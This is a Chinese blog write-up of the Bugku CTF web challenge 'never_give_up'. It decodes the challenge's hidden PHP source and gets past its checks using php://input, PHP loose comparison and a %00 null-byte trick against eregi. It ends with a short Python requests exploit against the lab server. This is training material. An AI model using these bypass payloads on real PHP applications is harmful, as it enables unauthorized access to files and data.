ctf-web-never_give_up

最新推荐文章于 2024-03-13 17:55:40 发布
最新推荐文章于 2024-03-13 17:55:40 发布
阅读量412 收藏 1
点赞数
分类专栏: ctf 文章标签: 网络安全 前端 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124112964
版权

题目:

打开网址并查看源代码:

发现源代码中有提示1p.html

于是访问网址http://114.67.175.224:11868/1p.html,发现会自动跳转到bugku

尝试访问view-source:http://114.67.175.224:11868/1p.html,可以看到该网页源代码:

 escape解码Words,得到:

<script>window.location.href='http://www.bugku.com';</script>
<!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF-->

对<!--   -->内的编码尝试使用base64解码得到:

%22%3Bif(!%24_GET%5B'id'%5D)%0A%7B%0A%09header('Location%3A%20hello.php%3Fid%3D1')%3B%0A%09exit()%3B%0A%7D%0A%24id%3D%24_GET%5B'id'%5D%3B%0A%24a%3D%24_GET%5B'a'%5D%3B%0A%24b%3D%24_GET%5B'b'%5D%3B%0Aif(stripos(%24a%2C'.'))%0A%7B%0A%09echo%20'no%20no%20no%20no%20no%20no%20no'%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20%40file_get_contents(%24a%2C'r')%3B%0Aif(%24data%3D%3D%22bugku%20is%20a%20nice%20plateform!%22%20and%20%24id%3D%3D0%20and%20strlen(%24b)%3E5%20and%20eregi(%22111%22.substr(%24b%2C0%2C1)%2C%221114%22)%20and%20substr(%24b%2C0%2C1)!%3D4)%0A%7B%0A%09%24flag%20%3D%20%22flag%7B***********%7D%22%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20!!!%22%3B%0A%7D%0A%0A%0A%3F%3E

再次escape解码得到:

";if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
	$flag = "flag{***********}"
}
else
{
	print "never never never give up !!!";
}


?>

发现想要得到flag需要判断条件:$data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4为真:

1、$data=="bugku is a nice plateform!"

                根据前提条件可以看出,$data = @file_get_contents($a,'r');但是根据

if(stripos($a,'.'))
{
	echo 'no no no no no no no';
	return ;
}

                可知,$a内容不能包含'.',因此这里不能上传$a文件,要想得到$data=="bugku is a nice plateform!",可以对@file_get_contents($a,'r')使用php://input绕过:

                a)先使得$a=php://input;b)再post传参@file_get_contents想要返回的数据。

2、 $id==0

                根据

if(!$_GET['id'])
{
	header('Location: hello.php?id=1');
	exit();
}

                可知不能直接传参$id=0,不然!$_GET['id']=!0为真,将会跳出整个脚本

                因此可以利用php弱相关,如使得$id="0xas",使得判断条件为假且$id==0

3、strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4

                想要同时满足以上三个条件,对于$b的第一个字符:

                1)可以使用结束符%00,使得$b=%0011111

                2)也可以使用正则表达式,如$b=?11111或者$b=.11111,$b=*11111都行(后五个字符随意)

如此,可以编写:

import requests
url="http://114.67.175.224:11868/hello.php?id=0x&b=%0011111&a=php://input"
headers={
    "Content-Type":"application/json"
    }

pp=requests.post(url,headers=headers,data="bugku is a nice plateform!").text
print(pp)

得到flag:

 

榴莲 蛋挞
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Bugku web21 never give up
weixin_44522540的博客
02-23 287
十七、web21 never give up view-source:http://114.67.246.176:15306/1p.html <script>window.location.href='http://www.bugku.com';</script> <!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCU
BugKu:never give up
wssmiss的博客
04-16 344
题目 查看源代码: 根据提示打开lp.html 中间有一段base64编码和url编码 var Words =" < !–JTIyJTNCaWYlMjglMjElMjRfR0VUJTVCJTI3aWQlMjclNUQlMjklMEElN0IlMEElMDloZWFkZXIlMjglMjdMb2NhdGlvbiUzQSUyMGhlbGxvLnBocCUzRmlkJTNEMSUyNyUyO...
never_give_up——bugku
m0_46607055的博客
10-30 679
前言 一个很老的题目了。两前年有个投机取巧的题解。 直接访问f4l2a3g.txt 得到flag。 现在修复了,必须按部就班的做。 那、来吧。 解题过程 访问靶场、查看源码,发现有1p.html 访问会跳转到https://www.bugku.com/ 用burp拦截一下试试 (写笔记复现的时候没有拦截成功。但是第一遍确实是没问题的。) 在p1.html的源码里发现有注释 <!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3...
CTF之PHP黑魔法总结
aiquan9342的博客
10-05 465
继上一篇php各版本的姿势(不同版本的利用特性),文章总结了php版本差异,现在在来一篇本地日记总结的php黑魔法,是以前做CTF时遇到并记录的,很适合在做CTF代码审计的时候翻翻看看。 一、要求变量原值不同但md5或sha1相同的情况下 1.0e开头的全部相等(==判断) 240610708 和 QNKCDZO md5值类型相似,但并不相同,在”==”相等操作符的运算下,结果返回...
BUGKU-WEB never_give_up
最新发布
天泽岁月
03-13 1112
BUGKU-WEB never_give_up,eregi函数漏洞,%00截断
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
ctf-field-guide.zip_ctf_pdf
09-23
ctf介绍及相关培训介绍 学习ctf的注意事项
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
never-give-up:永不放弃的PyTorch实现
05-26
永不放弃 永不放弃的PyTorch实施:学习定向探索策略[] 仅实施了具有嵌入网络的偶然性好奇心。 安装 使用Python 3.7.9测试 pip install -r requirements.txt 火车 python train.py 结果 5x5结果 学分 R2D2基地是从通过
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3009
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
献给web安全的CTF课堂小测
weixin_44765508的博客
11-18 1135
What’s your want? 根据题目提示:Do you want flag?输入“flag”,返回一个加密字符串 2. base64 解密得到:flag{WelC0me_to_ctf2} php is the best 点击“another page”,查看源码,发现web目录的树结构中有flag文件 源码中还有对file路径的过滤: strpos():查找字符串第一次出现位置 https://www.w3school.com.cn/php/func_string_str
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9349
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
Bugku-CTF之never give up
weixin_34262482的博客
04-25 338
Day23 never give up http://123.206.87.240:8006/test/hello.php 本题要点:url编码,base64编码,代码审计,php函数 查看源码~ 访问1p.html http://123.206.87.240:8006/test/1p.html 发现时bugku主页 ...
BUGKU_WEB_never give up
308宿舍的鶸
08-12 1117
进去以后发现只有一行字符串’never never never give up !!!‘ 查看源码发现有一行&lt;--1p.html--&gt; 于是乎访问120.24.86.145:8006/test/1p.html,结果跳转到了www.bugku.com 百度了解到可以使用view-source:url的方式查看网页源码,遂访问view-source:120.24.86.145:800...
Bugku CTF web2
qq_61768489的博客
04-12 3716
source 先dirsearch扫,发现.git 泄露 上工具 ,git_extract ,直接就把flag文件下好了 文件包含 提示index.php ,也给了get,可能flag就在这里面 用伪协议读取就可 /index.php?file=php://filter/convert.base64-encode/resource=index.php 备份是个好习惯 扫了一波,备份是 index.php.bak 下载下来后把后缀修改成php 才能看见源码 .
CTF writeup 1_网络安全实验室
热门推荐
Troy
10-26 31万+
基础关1.key在哪里? 过关地址打开网址 “key就在这里中,你能找到他吗? ” 看看源代码有没有线索~果然<html> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> </head> <body> key就在这里中,你能找到他吗?
BugKu
qq_51177088的博客
04-24 174
用来记录BugKu新学到的 文章目录web 8 文件包含 web 8 文件包含 题目:文件包含 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 自己思路:需要在php函数中运行Linux系统代码一般使用exec()函数和system()函数 system() 输出并返回最后一行shell结果。 exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。 本题使用于system,因为会输出结果,用exec不会输出结果 构造
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值